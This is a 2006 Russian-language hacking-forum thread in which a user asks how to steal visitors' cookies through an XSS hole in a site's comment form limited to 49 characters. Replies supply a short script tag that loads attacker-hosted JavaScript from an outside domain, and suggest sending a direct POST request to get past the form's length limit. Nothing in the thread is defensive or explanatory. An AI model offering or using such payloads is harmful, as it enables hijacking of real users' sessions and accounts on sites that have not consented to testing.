HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу 49 символов для Xss атаки
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

49 символов для Xss атаки
  #1  
Старый 19.11.2006, 23:00
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
С нами: 10257160

Репутация: 5
По умолчанию 49 символов для Xss атаки
Есть уязвимость на сайте: в форме комментариев можно вписать html теги. Как можно сформировать такой JavaScript, шоб своровать куки для формы в 49 символов (обрезаеться базой)?
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось cop; 19.11.2006 в 23:07..
 
Ответить с цитированием

  #2  
Старый 19.11.2006, 23:06
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
http://forum.antichat.ru/thread25933.html
 
Ответить с цитированием

  #3  
Старый 19.11.2006, 23:11
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
С нами: 10257160

Репутация: 5
По умолчанию
Green_Bear, да, это все понятно. У меня для формы доступно только 49 символов, я не могу ничего придумать, шоб как-нить сформировать рабочий код. (я в первом сообщении исправил про 49 символов)
 
Ответить с цитированием

  #4  
Старый 19.11.2006, 23:13
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
<script src='http://site.ru/a.js'></script>

А в site.ru/a.js написать остальной код
 
Ответить с цитированием

  #5  
Старый 19.11.2006, 23:55
nc.STRIEM
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
С нами: 10578566

Репутация: 1228


По умолчанию
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли POST запрос, в самао скрипте редко длинна проверяеться!
а ваше смотри что те _Great_ написал!
 
Ответить с цитированием

  #6  
Старый 20.11.2006, 00:04
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
Цитата:
А чем эти 49 символов обрезаються???? Есле это ограничение в форме, то прост пошли Post запрос, в самао скрипте редко длинна проверяеться!
он же написал - базой.. а это хреново. Но моим способом уложиться можно
 
Ответить с цитированием

  #7  
Старый 20.11.2006, 00:19
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
С нами: 10257160

Репутация: 5
По умолчанию
супер, ребята спасибо!!!!
 
Ответить с цитированием

  #8  
Старый 20.11.2006, 00:20
cop
Познающий
Регистрация: 14.11.2006
Сообщений: 66
С нами: 10257160

Репутация: 5
По умолчанию
не допер шото сам
 
Ответить с цитированием

  #9  
Старый 20.11.2006, 17:17
jonart
Познающий
Регистрация: 06.04.2005
Сообщений: 53
С нами: 11102129

Репутация: 19
По умолчанию
_Great_
а у мня вопрос а если перед вставкой в бд например он проверяет кол-во символов поступающих получиться что он еще и посчитает все символы и с файла который вставляем ведь!Верно?
 
Ответить с цитированием

  #10  
Старый 20.11.2006, 17:20
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию
ну ты гонишь. ничего там не будет считать с файла.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.